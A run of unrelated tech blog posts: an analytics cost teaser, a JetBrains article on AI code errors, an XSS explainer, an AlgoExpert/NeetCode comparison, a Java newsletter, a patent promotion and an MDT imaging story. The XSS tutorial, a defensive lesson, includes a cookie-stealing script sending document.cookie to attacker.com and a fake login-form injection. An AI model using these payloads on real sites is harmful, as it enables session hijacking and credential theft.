“OSS is free” is technically true and operationally misleading. License-fee-zero stops mattering once you count 40 build hours and 6-8 monthly ops hours at ¥5,000/hour. The real question for an SMB EC operator isn’t “free vs paid” — it’s “do I want my team’s hours pointed at revenue work or at dashboard maintenance?”

The full breakdown — per-option TCO math, suitability profiles, and references — is at Matomo / Umami / GA4+Looker Studio Self-Build vs RevenueScope: 1-Year TCO for EC Revenue Dashboards. For the prior post in this series (full-feature SaaS comparison, not self-build), see Triple Whale vs RevenueScope.

Stop Sending IDE-Catchable AI Code Errors to Review

AI coding tools might have handed your developers a productivity gain, but they’ve created a problem for your code review process. Pull request volume is up significantly, and the code arriving for review carries error patterns that weren’t common before generative AI. Yet it’s the same people with the same working hours who are in charge of reviewing it all.

Most engineering leaders are still working out what to do about it. According to our State of Developer Ecosystem 2025 survey of more than 24,000 developers, the dominant pattern is ad hoc: Developers simply use AI tools as they see fit with little governance from above.

Studies report that around 20%–25% of AI code hallucinations are detectable through automated structural and static analysis. Those checks can take place in the environment where the code was written, before a pull request is raised. No governance framework required, no new process layer. 

The case is straightforward: your reviewers’ judgment is a finite resource. Every structural error that reaches review consumes some of it. Every structural error caught earlier doesn’t.

Code review is a decision process – AI just added more decisions

DX’s Q4 2025 data on 51,000 developers showed that daily AI users merge 60% more pull requests per week than light users. A 2025 randomized controlled trial across three enterprise companies found that developers who had access to an AI coding assistant completed 26% more tasks per week than those in the control group without access.

More code arriving at review means more decisions per reviewer per day. That pressure has a measurable cost. Decades before AI coding tools entered the picture, researchers found that review rate was a statistically significant factor in defect removal effectiveness, even after controlling for developer ability. More time spent per line of code reviewed was consistently associated with a greater number of defects found. 

Skill alone couldn’t compensate for rushing. Better tooling should – but tools, including modern AI-assisted ones, have yet to close the gap between what a reviewer sees and what a reviewer needs to know:

  • A 2024 study of a company’s AI code review tool found that even with 73.8% of automated review comments acted on, pull request closure time still increased 42%. The commentary was useful, but the burden was not reduced.
  • In 2025, an empirical study of 16 AI code review tools across more than 22,000 comments discovered that their effectiveness varied widely.
  • A January 2026 study revealed that effective review requires much more than a snapshot of what code was added or removed. Reviewers move between issue trackers, documentation, team discussions, and CI reports to understand what a change means in the codebase they are reviewing.

Review tools continue to leave it to developers to form the big picture. AI has added to that gap, not closed it.

AI is sending a different kind of code to review

A 2025 analysis of more than 500,000 code samples found that AI-generated code carries a distinct error profile: unused constructs, hardcoded values, and higher-risk security vulnerabilities that are more common than in human-written code. A separate 2025 study identified defect categories with no real equivalent in human-written code. 

The error profile is challenging enough. But the way reviewers engage with AI-generated code compounds it. A 2026 study found a reviewers’ blind spot: AI-generated pull requests containing nearly twice the code redundancy drew fewer negative reactions from reviewers than human-written ones. Surface-level plausibility appeared to reduce critical engagement.

More volume. New error types. Less scrutiny. What does the delivery data show?

A 7.2% reduction in delivery stability for every 25% increase in AI adoption, according to DORA. They attributed this pattern partly to larger changesets: More code generated means bigger batches at review, and bigger batches have consistently predicted instability. Size is the signal. The defect profile and the scrutiny data suggest what is behind it. 

Have machines catch what machines can

Automated structural and static checks don’t involve human judgment calls. But who is putting those checks in place? Even at organizations with mature engineering practices, structural screening didn’t emerge adequately at the individual level:

  • Google, running LLM-powered code migrations across its codebase, found that reviewers needed to revert AI-generated changes often enough that the organization made a deliberate investment in automated verification to reduce that burden.
  • Uber, processing tens of thousands of code changes weekly, found that AI-assisted development was overloading reviewers and built an automated review system that runs before human reviewers engage.

In both cases, the fix required an organizational decision. Google and Uber chose to do this at the pipeline level – upstream of pull requests.

The right development environment can catch the same category of errors earlier and requires no separate infrastructure. 

Put “no-excuses” structural analysis before the pipeline

According to the 2025 Stack Overflow Developer Survey, developers use an average of 3.6 development environments. Which ones to use is typically their call. They know their languages and workflows. 

As an engineering leader, you should know whether at least one of those environments is running deep, no-excuses checks of AI-generated code against what actually exists across the entire codebase in all languages. Many development environments do not; they rely on language-by-language approximations instead.

The distinction matters more at the organizational level than at the individual level. A developer working in a single language with a well-configured approximation-based setup may not feel the gap. But the quality of structural analysis across a team is only as consistent as the weakest setup in it.

The same studies on AI code hallucinations found that roughly 44% involve errors that no automated check reliably surfaces. That is more than enough for your reviewers to contend with. Protect their capacity for only what they can handle. 

For every major language your team uses, there is a JetBrains IDE available to maintain a whole-project-resolved model of your codebase. Any code that lands in the editor – regardless of which AI tool produced it – is checked against that model. For teams that want enforcement both before and in the pipeline, Qodana extends that same inspection depth into CI/CD. 

Your reviewers’ judgment is the resource. Structural screening is how you protect it.

See how JetBrains for Business supports that symbiosis at scale.

XSS Explained: How Attackers Execute JavaScript Inside Your Application

Hook

What if an attacker could execute JavaScript inside your users’ browsers — using nothing more than a comment box?
That’s exactly what Cross-Site Scripting (XSS) enables.

Let’s break down how this actually happens in real applications.

What is XSS?

The flow of a typical XSS attack is illustrated above.

Cross-Site Scripting happens when an application renders untrusted user input directly into a web page.
Instead of displaying the input as plain text, the browser interprets it as executable JavaScript.

This allows attackers to run malicious code in another user’s browser — under your application’s trusted domain.

Types of XSS

✔ Stored XSS
Attacker submits malicious input.
Application stores it in database.
Every user who loads the page executes it.

Example scenario:
Comment section
✔ Reflected XSS
Input comes from request (URL/form)
Reflected immediately

Example:
Search page
✔ DOM-based XSS
No server involvement.
Client-side JavaScript inserts attacker-controlled data into DOM.
While these types differ in how the payload is delivered, the core issue is the same: untrusted input is executed as code.

Practical Example

❌ Vulnerable Example (Java/JSP)
String comment = request.getParameter("comment");
saveComment(comment);

Later Rendered:
<div><%= comment %></div>
The application assumes the comment is harmless text.
But the browser has no way to know that.

💥 Attack Input
<script>alert('XSS')</script>
When rendered:
<div><script>alert('XSS')</script></div>

Browser executes it.
The browser has no way to distinguish between legitimate code and attacker-injected code.
Instead of displaying text, the browser executes JavaScript.

Escalate Attack (Attacker Mindset)

Cookie Theft Example

<script>
fetch("https://attacker.com/steal?cookie=" + document.cookie);
</script>

This sends victim session cookies to attacker.
If session cookies are not protected, attacker may hijack active sessions.
This works because browsers automatically include cookies with requests to the same domain.

Fake Login Form

<script>
document.body.innerHTML =
'<h2>Session Expired</h2><input placeholder="Password">';
</script>

Attacker replaces page content with fake UI.
Users unknowingly enter credentials.

Real Impact

Session hijacking

Attacker steals authenticated session.

Account takeover

Victim account accessed without password.

Data theft

Sensitive page data can be extracted.

Phishing inside app
This is especially dangerous because users trust your domain.
Users are far more likely to trust fake prompts when they appear inside a legitimate application they already trust.

The dangerous part about XSS is that it doesn’t attack your backend — it exploits the trust between your application and your users.

How to Prevent XSS

✅ Output Encoding

Escape special characters
Convert < →&lt;
👉 Key idea:
Treat user input as data, not HTML
Unsafe:
<div><%= userInput %></div>

Safe:
<div><c:out value="${userInput}" /></div>

Special characters become text:
<script> becomes visible text instead of executable code.

Method Browser Sees (Source Code) Browser Does
<c:out> &lt;script&gt;evil()&lt;/script&gt; Displays literal text on screen.
<%= %> <script>evil()</script> Executes the script immediately.

✅ Framework Protection

Modern frameworks escape by default.
React (safe)
<div>{userInput}</div>

Dangerous
<div dangerouslySetInnerHTML={{ __html: userInput }} />

Usually, when you render data in React using curly braces {userContent}, React automatically escapes the content. This means it treats everything—including HTML tags—as literal text, preventing malicious scripts from executing.

When you use dangerouslySetInnerHTML, you are telling React to skip that protection and inject the raw string directly into the DOM

✅ ####Content Security Policy
Restrict script execution
Content-Security-Policy: default-src 'self'; script-src 'self';
Even if script injection happens, browser blocks unauthorized script execution.

Common Mistakes

Trusting user input

Never assume users behave correctly.

Using innerHTML

Unsafe:
element.innerHTML = userInput;
Safe:
element.textContent = userInput;

Disabling escaping

Framework protections exist for a reason.

Final Thoughts

Think like an attacker:

Ask:

  • Can I inject script here?
  • Will the browser execute it?
  • Can I steal trust from this page?

XSS is dangerous because it doesn’t attack your server directly — it attacks your users through your application.

If your application renders user input without proper encoding, you’re handing attackers control of your users’ browsers.

In XSS, the attacker doesn’t break your system — they use it against your users.

Always treat user input as data — never as code.

AlgoExpert vs NeetCode: The Interview Skill Neither One Actually Trains

A few years back I worked through both AlgoExpert and NeetCode while preparing for interviews. The 100 polished videos and the 400+ free walkthroughs were useful for what they covered. The interview round that broke me wasn’t a problem either platform had skipped. It was a problem they both had a clean walkthrough for, where I could read either solution after the round and recognise the technique, but in 25 minutes against a whiteboard I couldn’t see it.

The problem was Longest Palindromic Substring. Both platforms have a video. Both derive expand around centre cleanly. After watching either, the technique makes sense. The issue was the interviewer didn’t say “this is a palindrome expansion problem.” The prompt said “find the longest substring that reads the same forwards and backwards.” That gap, between the technique I could follow on a video and the technique I could spot from a description, is what neither platform set out to train.

TL;DR: AlgoExpert wins on video depth per problem. NeetCode wins on breadth and free access. Both teach how techniques work after you’ve named the technique. Neither teaches the recognition before the technique gets named, and that recognition is what an unseen medium problem tests.

What AlgoExpert is good at

Clement’s videos are clean. There’s no other word for them. He picks 100 problems, records each one, walks brute force to optimal in a consistent visual style, and the editing makes the reasoning easy to follow. The single instructor consistency is underrated. After three videos you’ve adapted to his vocabulary, his pacing, and his shorthand for tradeoffs. From video four onward you spend less time adapting and more time absorbing.

The browser IDE inside AlgoExpert is also the best of any platform I tried that leads with video. After watching the walkthrough you have a workspace already loaded with the function signature, the tests, and the language template. The transition from passive watching to active solving costs you no setup, which matters more than it sounds.

The bundle is the other thing the platform gets right. SystemsExpert and FrontendExpert sit beside AlgoExpert under one account. If you’re prepping across DSA, system design, and frontend rounds, paying once for three coordinated curriculums is a real saving in cognitive load alone. The argument that “100 problems is too few” misses what AlgoExpert is going for. The platform aims for depth on a small set, not coverage of everything. On that goal it lands.

What NeetCode does well

NeetCode’s free tier is the best reason to start there. The YouTube channel covers more problems than most paid platforms, and the production quality has improved year over year. NeetCode 150 is the most widely shared curated list in the prep community for a reason. You get a defensible problem ordering without any commitment.

The community momentum is the second thing NeetCode does that almost nobody else matches. Engineers swap solutions in the YouTube comments, swap timelines on the subreddit, swap notes in Discord. Studying alone is the failure mode for most preparation. A platform that pulls you into a group of people preparing in parallel is doing real work, even if the work isn’t a feature on a comparison sheet.

The mapping to LeetCode is also worth naming. The problems you practise on NeetCode are the same problems Big Tech screening tools serve, which means your practice environment matches your screening environment. AlgoExpert’s IDE is more polished, but NeetCode’s environment matches what you’ll actually face when a recruiter sends you a Codility or HackerRank link.

The shared gap, made concrete

Take Longest Palindromic Substring. The interview prompt is one sentence: given a string, return the longest substring that reads the same forwards and backwards. AlgoExpert’s video derives expand around centre cleanly. NeetCode’s video does the same with a slightly different style. Watch either and the solution makes sense.

What neither video sets you up to do is the move that happens before the technique gets named. The move is reading the prompt, noticing that a substring is being asked for, noticing the symmetry constraint, and reaching for expand around centre rather than DP because of those two visible features. In an interview, no one labels the problem for you. Your search for a technique starts from the description, not from a category tag.

The pattern repeats across topics. Take a tree problem like Binary Tree Maximum Path Sum. Both platforms have walkthroughs. After watching either you can reproduce the postorder helper that returns the local max while updating a global. What neither walkthrough installs is the recognition that “any node, any path, any direction” signals the helper-with-side-effects pattern. The walkthrough teaches the pattern. The recognition is a separate skill the walkthrough assumes you’ll pick up by exposure.

What recognition is, mechanically

Recognition is a small set of features you can name on the prompt before any code is written. For expand around centre, the features are roughly:

  1. The output is a substring of a string.
  2. The constraint involves symmetry, palindromes, or some “reads the same in both directions” property.
  3. Other approaches bottom out at quadratic, so the technique you’re looking for is O(n^2) or O(n log n), not O(n) or sub-linear.

When all three apply, expand around centre is the candidate technique to try. Longest Palindromic Substring matches all three. Palindromic Substrings (count, not length) matches the first two. Both fall under the same recognition rule.

This is the part neither AlgoExpert nor NeetCode targets directly. Their walkthroughs assume you’ve already arrived at the technique, then explain it. The arriving is the work no one is helping you do.

Why volume alone doesn’t close it

The cognitive science name for this is the generation effect. Producing an answer from first principles, even imperfectly, builds stronger memory and stronger transfer than recognising a familiar solution. Watching a walkthrough builds recognition of an answer you’ve been shown. Interviews ask for generation, where you produce the technique from a description you haven’t seen.

What you watch and what you generate aren’t the same skill. Watching ten variants of expand around centre gives you a strong recognition memory for variants close to what you watched. The interview problem is rarely close enough. It tends to look just different enough that the recognition memory misses, and you stall on what to try next.

The transfer of learning literature splits this into near transfer and far transfer. Near transfer is solving problems that look like ones you’ve already solved. Far transfer is reasoning through problems that look different but follow the same underlying pattern. Volume in the AlgoExpert / NeetCode mode produces near transfer reliably. Far transfer comes from a different practice shape, where the recognition gets trained on its own.

A recognition protocol you can run this week

If you’ve worked through either platform’s content and unfamiliar mediums still freeze you, the move isn’t another fifty walkthroughs. It’s a tighter loop on recognition first.

  1. Pick one technique a week. Expand around centre, sliding window, two pointer, monotonic stack, postorder with side effects.
  2. Write down the trigger features for that technique. Three or four specific features you can see in a problem statement that, when they all apply, make this technique the candidate. Write them in your own words, not from a cheat sheet.
  3. Read five problems that use this technique without solving them. For each, name the triggers you can see in the prompt before reading any constraints in detail.
  4. Solve three or four problems on the technique with the problem name and category tag hidden. The cover-the-name move is what forces you to recognise the technique before coding starts.
  5. Once a week, do one pressure session. Cover the title, set 25 minutes, talk through your reasoning out loud, and don’t open the IDE until you’ve named the technique you intend to use.

A technique a week, eight or ten weeks of focused work. That replaces the hundred-plus mediums where the signal you actually need gets buried under details that don’t matter.

Both AlgoExpert and NeetCode are reasonable choices for the watching part of this loop. Once you’ve watched the technique once or twice, the work that compounds is the recognition reps the walkthroughs don’t include.

If you’ve already watched hundreds of walkthroughs but still freeze on unfamiliar mediums, the problem usually isn’t knowledge.

It’s recognition.

I wrote a longer breakdown comparing AlgoExpert and NeetCode on:

  • depth vs breadth
  • passive watching vs active recall
  • and the recognition drills that finally fixed this for me

When did the recognition click for a pattern you used to watch and re-watch without spotting on a fresh problem, and what was the specific problem that broke it open?

Java Annotated Monthly – May 2026

April flew by. The pace of tech development didn’t slow, and the flow of news and knowledge didn’t either.

This month, Emily Bache joins us to share some sharp finds about AI agents and test-driven development. Java stays busy with fresh updates and practical tips, and Kotlin keeps pushing forward right next to it. The AI section is, as usual, packed with things worth your attention.

You’ll also find upcoming events to plan for and a few ideas to challenge your thinking.

Featured Content 

Emily Bache

Emily Bache is an independent consultant, YouTuber, author, and Technical Coach, with over 25 years of experience working with Java and other programming languages and tools. She works with developers, training and coaching effective agile practices like refactoring and test-driven development. Emily has written two books about software development and contributed to several others. Emily founded the Samman Technical Coaching Society in order to promote technical excellence and support coaches everywhere.

It’s my pleasure to bring to your attention some interesting content that appeared in April. The huge change that is sweeping through our industry right now is the adoption of AI coding agents, which many people are using instead of hand-coding changes to software. One of the most important new skills to master is designing a “harness” for your AI tool, and this month Birgitta Böckeler has published the best reference I’ve seen so far about what that is and a mental model for how to think about it. Chris Parsons has also published an extensive guide titled How I use AI to Code, which is a really great resource for experienced developers looking to create their own harness and mentor others to do the same.

Perhaps as a contrast, I’d also like to highlight Michael Taggart’s introspective experience report on his use of AI. He wrestles with his conscience over using these tools at all. An interesting metaphor for AI-assisted coding came up in an article by Drew Breunig – we run the risk of building a Winchester Mystery House. After you read that, listen to Kevlin Henney’s talk Being the Human in the Loop, where he takes a look at the engineering skills we still need – ones that could perhaps prevent the kind of thing Drew writes about from happening. 

I have a particular interest in test-driven development, which, as a technical coach, is a big part of what I teach to others. I wrote an initial assessment of what TDD looks like these days, based on interviews with several practitioners I trust who are all using agentic AI. For those of you who’d like to see me in action writing code,  I have a demo of a narrow integration test for an outbound port in a hexagonal architecture, in Kotlin.

Java News

Catch what shipped and track what’s next:

  • Java News Roundup 1, 2, 3, 4
  • Newsletter: Java 26 Is Now Available | JDK 27 Heads-Ups
  • Quality Outreach Heads-up – JDK 27: Obsolete Translation Resources Removed
  • Update Your JDK, Read More Code, and Talk to Your Users: Interviews From VoxxedDays Amsterdam (#93)

Java Tutorials and Tips

Steal these tricks:

  • Analysing Crashed JVMs – Inside Java Newscast #109
  • Oracle’s Java Verified Portfolio and JavaFX: What It Actually Means
  • 10 Things I Hate About Java by Adele Carpenter
  • Is AI Ruining Java Open Source? – Andres Almiray | The Marco Show
  • Java 26: Updates You Must Know
  • Java and Gen AI: JVM Agents With Embabel by Rod Johnson (Spring Creator)
  • A Bootiful Podcast: Java Developer Advocate Ana-Maria Mihalceanu
  • Does Java Really Use Too Much Memory? Let’s Look at the Facts (JEPs)
  • Thread-Safe Native Memory in Java: VarHandle Access Modes Explained
  • Episode 54 “How JDK 26 Improves G1’s Throughput” [AtA]
  • You Must Avoid Final Field Mutation – Inside Java Newscast #110
  • How the JVM Optimizes Generic Code
  • The Curious Case of Enum and Map Serialization
  • Avoiding Final Field Mutation

Kotlin Corner

  • Kotlin kontra Java – Part 1 – Ecosystem
  • Kotlin Professional Certificate by JetBrains – Now on LinkedIn Learning
  • Introducing Koog Integration for Spring AI: Smarter Orchestration for Your Agents
  • Reliable AI Agents Using Domain Modeling With Koog in Java

AI 

Cut the hype, test the tools, and boost your flow: 

  • How We Built a Java AI Agent by Connecting the Dots the Ecosystem Already Had
  • Stateful Continuation for AI Agents: Why Transport Layers Now Matter
  • A Bootiful Podcast: Mark Kropf on AI Orchestration
  • Embabel Tools & MCP Servers: Supercharge Your Java AI Agents
  • Adversarial AI: Understanding the Threats to Modern AI Systems
  • Why Java Developers Over-Trust AI Dependency Suggestions
  • A GitHub Agentic Workflow 
  • ACP Java SDK: Building IDE Agents in Java 
  • Spring AI Agentic Patterns (Part 7): Session API – Event-Sourced Short-Term Memory with Context Compaction
  • Beyond RAG: Architecting Context-Aware AI Systems With Spring Boot 
  • Spring AI Agentic Patterns (Part 6): AutoMemoryTools – Persistent Agent Memory Across Sessions 
  • 5 Best Practices for Working with AI Agents, Subagents, Skills, and MCP 
  • Deepfakes, Disinformation, and AI Content Are Taking Over the Internet
  • MCP in the Java World: Bringing Architectural Strategy to LLM Integrations

Languages, Frameworks, Libraries, and Technologies

Explore new tools and technologies, and revisit the old ones:

  • This Week in Spring 1, 2, 3, 4
  • Article: Beyond RAG: Architecting Context-Aware AI Systems With Spring Boot
  • Six and a Half Ridiculous Things to Do With Quarkus
  • The Spring Team on Spring Framework 7 and Spring Boot 4
  • A Bootiful Podcast: The Legendary Craig Walls
  • Enabling Reflection-Free Jackson Serializers by Default 
  • Understanding Performance 
  • A Bootiful Podcast: A Bootiful Podcast: Dr. Venkat Subramaniam and James Ward on Intelligent Kotlin and So Much More
  • The Road to Docker Official Images for Java: The Azul Zulu Story
  • Spring Debugger New Power: Where Should I Click to Demystify Spring Boot Magic?

Conferences and Events

Join the crowd online or offline:

  • JAX – Mainz, Germany or Online, May 4–8
  • Devoxx UK – London, United Kingdom, May 6–7; JetBrains will have a booth at the event. Also, come and listen to our JetBrains speakers: Marit van Dijk, Cheuk Ting Ho, and Simon Vergauwen. The Spring documentary will premiere there, followed by a panel with Josh Long, Steve Poole, and Marit van Dijk.
  • GeeCon – Kraków, Poland, May 14–15; Marit van Dijk is speaking and moderating a panel on Java to discuss what excites each of them most about Java in 2026. 
  • JAlba – Edinburgh, Scotland, May 14–16
  • JNation Conference – Coimbra, Portugal, May 26–27; Anton Arhipov and Marit van Dijk from JetBrains are the speakers. 
  • JCON Slovenia – Portorož, Slovenia, May 27–29

Culture and Community

Where do you stand on these topics?

  • Panel: Building a Culture That Works
  • How to Do What You Love and Make Good Money 
  • Do Things That Don’t Scale 
  • Encoding Team Standards 
  • Beyond the Hype: Is AI Taking the Fun out of Software Development? 

And Finally…

One last thing before you close the article. Don’t skip it!

  • Using Spring Data JPA With Kotlin
  • Using Spring Data JDBC With Kotlin
  • Speeding up Interactive Rebase in JetBrains IDEs
  • From Java to Wayland: A Pixel’s Journey

That’s it for today! We’re always collecting ideas for the next Java Annotated Monthly – send us your suggestions via email or X by May 20. And don’t forget to check out our archive of past JAM issues for any articles you might have missed!

Five Eyes published the policy on 1 May. Mickai filed the engineering 4 weeks earlier.

Cross-posted from mickai.co.uk.

On 1 May 2026, the Five Eyes intelligence alliance (UK NCSC, US CISA, Australia ASD, Canada CCCS, New Zealand NCSC NZ) issued joint guidance on Agentic AI security. The headline findings: AI agents need verifiable identity, signed audit trails, and cryptographic attestation of behaviour.

Four weeks earlier, on 4 April 2026, I (Micky Irons) filed UK patent application GB2610413.3 at the Intellectual Property Office: the Open Inter-Vendor Audit Record (OAR) format. Twenty claims. The same engineering primitive the Five Eyes guidance describes, only it is already in the public patent record.

The OAR primitive in plain English

Every action an AI agent takes (prompt received, tool call dispatched, model invoked, memory written, response emitted) is captured as an Audit Record. Each record is:

  • Cryptographically signed with a hardware-bound key (post-quantum, ML-DSA-65, FIPS 204).
  • Chained to the previous record so tampering breaks the chain.
  • Vendor-portable. The record format is open. A regulator, an auditor, or the user can verify the chain without depending on the vendor that produced it.

That last property is the policy hook. Five Eyes asked: how does a defender prove what an agent did? OAR’s answer: read the chain, verify the signatures, done. No vendor cooperation required.

Why “4 weeks earlier” matters

Filing dates at the UK IPO are immutable public record. GB2610413.3 has a UK IPO filing date of 4 April 2026. The Five Eyes guidance is dated 1 May 2026. Anyone can verify both dates independently.

This is not a coincidence. Mickai’s broader portfolio is 31 UK patent applications and 914 claims, all named to Mickarle Wagstaff-Irons (Micky Irons, the founder), all filed without external counsel via the UK IPO’s no-fee Apply for a Filing Date route. The work was done before the policy was written, because the policy was the obvious next step once the engineering existed.

What changes for builders

If you are shipping an agent today and you want to be ready for the regulatory wave that the Five Eyes guidance is about to trigger, the OAR primitive gives you three properties:

  1. Verifiability without vendor lock-in. Your customers can audit your agents without your help.
  2. Post-quantum readiness. ML-DSA-65 is the FIPS 204 standard. Quantum-resistant from day one.
  3. Hardware-bound identity. Keys live in TPM / Secure Enclave / TrustZone, not in environment variables.

The full architecture is documented at mickai.co.uk. The article that pegs this to the Five Eyes news is here:

Five Eyes Published the Policy. Mickai Filed the Engineering.

Mickai is a sovereign AI operating system built in Workington, Cumbria, by Micky Irons. 31 UK patent applications, 914 claims. No cloud round-trip. No telemetry. Sovereign by default.

Debugging the Deployment Pipeline (When the MDT Image Goes Ghost)

They call me a Support Tech, but I see myself as a Value Architect. I don’t just “install apps”—I engineer the logic that makes them deploy at scale. Recently, my flow was interrupted when our MDT image decided to stop cooperating. What should have been a routine laptop setup quickly turned into a high-stakes deep dive into systems integrity and deployment architecture.

The Glitch: The Logic Break
I was preparing to image a batch of fresh laptops when the process hit a wall. The system couldn’t find the instructions it needed to start, and Disk Management showed the drive as “Unallocated”.

  • The Problem: The bootable logic on the MDT image was corrupted.
  • The Stake: High-stakes deployments for the IMEA region were at a complete standstill.

The Systems Logic Fix
Instead of just re-downloading and hoping for a miracle, I treated the failure like a software bug that needed a structural fix:

  • Re-partitioning via Script: I didn’t just format the drive; I used Diskpart to re-align the partition logic to match modern UEFI standards—the specific environment Windows 11 requires to function.
  • Verifying Source Integrity: I navigated back to the source on SharePoint to download a fresh, verified IMEA MDT image. This ensured the “code” I was deploying was clean and optimized from the start.
  • The Result: The “ghost” drive was restored, becoming a perfectly functioning deployment tool once again.

Why This is Software Development
Software development is ultimately about creating repeatable, logical processes. By fixing the MDT pipeline, I wasn’t just fixing one laptop; I was ensuring that every future deployment followed a clean, automated script.

This is the exact mindset I am bringing into Data Science—identifying where a data flow is broken and re-building the pipe for maximum efficiency. Whether you’re writing Python or managing MDT images, the goal is Systems Logic. If the foundation is broken, the software won’t run. Fix the foundation first. ✌️